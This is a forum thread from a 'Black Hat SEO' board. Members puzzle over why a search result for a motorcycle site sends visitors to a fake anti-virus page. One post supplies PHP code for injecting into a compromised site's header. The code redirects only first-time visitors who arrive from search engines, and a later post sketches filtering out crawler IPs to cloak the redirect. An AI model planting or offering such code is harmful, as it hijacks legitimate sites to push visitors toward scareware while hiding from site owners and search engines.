1. This site uses cookies. By continuing to use this site, you are agreeing to our use of cookies. Learn More.

Google got tricked? Please help!!

Discussion in 'Black Hat SEO' started by vivianrollins, Jan 6, 2009.

  1. vivianrollins

    vivianrollins Regular Member

    Joined:
    May 13, 2008
    Messages:
    211
    Likes Received:
    98
    This is really strange so any input on how this is being done would be greatly appreciated. Go to Google and search for "moto euro" and you will see www.moto-euro.com as the #1 listing. DO NOT CLICK THIS LISTING YET.

    Go and type in the URL and you will find yourself on the real moto euro site. However, if you click on the listing from Google's SERP you will be directed to a SPAM site regarding anti-virus. Do NOT click OK or Cancel to the pop-up. Just click the X because I think clicking OK or Cancel might install malware on your PC - not sure but why take a chance.

    How is this possible? How is this being done? Can you imagine the ramification if CNN or Yahoo was 'hacked' like this?...although this is an exaggeration given that these two are bigger and their techs will fix this but there are so many manipulations you can do with this 'trick'.
     
  2. mrtornado

    mrtornado Power Member

    Joined:
    Dec 16, 2008
    Messages:
    501
    Likes Received:
    530
    Location:
    {LOCATION}
    Home Page:
    This is something interesting but I don't think google got hacked or tricked but probably
    Code:
    www.moto-euro.com
    has been.
     
    Last edited: Jan 6, 2009
  3. antsaoo

    antsaoo Supreme Member

    Joined:
    Oct 1, 2008
    Messages:
    1,292
    Likes Received:
    637
    Yup gives same thingy with yahoo and msn o_0 , bet someone hacked their site and put some funny things on there :)
     
  4. mrtornado

    mrtornado Power Member

    Joined:
    Dec 16, 2008
    Messages:
    501
    Likes Received:
    530
    Location:
    {LOCATION}
    Home Page:
    yep the link in google also points to the right site
     
  5. Jagged55

    Jagged55 Power Member

    Joined:
    Mar 27, 2008
    Messages:
    747
    Likes Received:
    325
    Occupation:
    Internet Marketing
    Location:
    Canada
    The link works fine for me...same site if I click the link or type it in.

    Edit: The malware warning comes up in IE, not Firefox
     
  6. kandor

    kandor Regular Member

    Joined:
    May 26, 2008
    Messages:
    274
    Likes Received:
    97
    sounds like a 302 or 301 high jack.

    kandor
     
    • Thanks Thanks x 1
  7. vivianrollins

    vivianrollins Regular Member

    Joined:
    May 13, 2008
    Messages:
    211
    Likes Received:
    98
    How is this possible given that Google's SERP is listing this the right URL but when you click on the SERP listing from Google that is when you get sent to a different URL.

    Clearly when you type in the URL as displaed on SERPs you are being redirected. If the site is hacked then why is it that when you go to the site directly you land on their real site?
     
  8. Jagged55

    Jagged55 Power Member

    Joined:
    Mar 27, 2008
    Messages:
    747
    Likes Received:
    325
    Occupation:
    Internet Marketing
    Location:
    Canada
    Just a guess would be that if regular members had the site bookmarked, they wouldn't want to tip them off about the fact that they were dropping adware on people. If the referrer is from Google, someone is just searching for them for the 1st time (in theory).
     
  9. vivianrollins

    vivianrollins Regular Member

    Joined:
    May 13, 2008
    Messages:
    211
    Likes Received:
    98
    Thanks Kandor. This is most likely it.
     
  10. mrtornado

    mrtornado Power Member

    Joined:
    Dec 16, 2008
    Messages:
    501
    Likes Received:
    530
    Location:
    {LOCATION}
    Home Page:
    yea in theory it redirects you only if the reffer comes from google
     
  11. kandor

    kandor Regular Member

    Joined:
    May 26, 2008
    Messages:
    274
    Likes Received:
    97
    And the only way to come out of a 301 or 302 high jacking is to get more links than the offending site.

    Kandor
     
  12. Ramage

    Ramage Registered Member

    Joined:
    Apr 9, 2008
    Messages:
    94
    Likes Received:
    82
    Location:
    New Zealand
    Code:
    www.clsc.net/research/google-302-page-hijack.htm
    More info there
    Read "The technical part: How it is done" section.
    I'm surprised it isn't fixed already considering how the exploit was found 4 years ago.
     
  13. vivianrollins

    vivianrollins Regular Member

    Joined:
    May 13, 2008
    Messages:
    211
    Likes Received:
    98
    Thanks - already read it and yes I'm also shocked that SEs have not address this flaw within their own codes.

    Scarier is that this can happen w/o intend on both parties and no recourse to resolve.

    Thanks all for contributing. I know I can count on my bro and sis at BHW.

    Cheers
     
  14. Sweetfunny

    Sweetfunny Jr. VIP Jr. VIP

    Joined:
    Jul 13, 2008
    Messages:
    1,779
    Likes Received:
    5,061
    Location:
    ScrapeBox v2.0
    Home Page:
    You inject code something like this in the top of the header:

    Code:
    <?php $seref=array("google","msn","live","altavista","ask","yahoo","aol","cnn","weather","alexa");
    
    $ser=0; foreach($seref as $ref) if(strpos(strtolower($_SERVER['HTTP_REFERER']),$ref)!==false){ $ser="1"; break; }
    
    if($ser=="1" && sizeof($_COOKIE)==0){ header("Location: http://www.spamsite.com"); exit; }?>
    
    This will redirect first time visitors coming from the major traffic sources, but not redirect others.
     
  15. benzole

    benzole Newbie

    Joined:
    Dec 14, 2008
    Messages:
    8
    Likes Received:
    2
    Is it a BLACK HAT board? :) I can't believe you guys didn't heard of http://en.wikipedia.org/wiki/Cloaking
    (btw there's probably not just a referer cloaking. It's very easy for search engines' bots to catch such type of redirect.

    I think the scheme is:

    1. Check the referer
    if the referer is good /google, live, yahoo etc/
    then
    2. Check the IP /it should not to be in the SE bots' base/
    if IP is not in base - go f*ck this user as you want.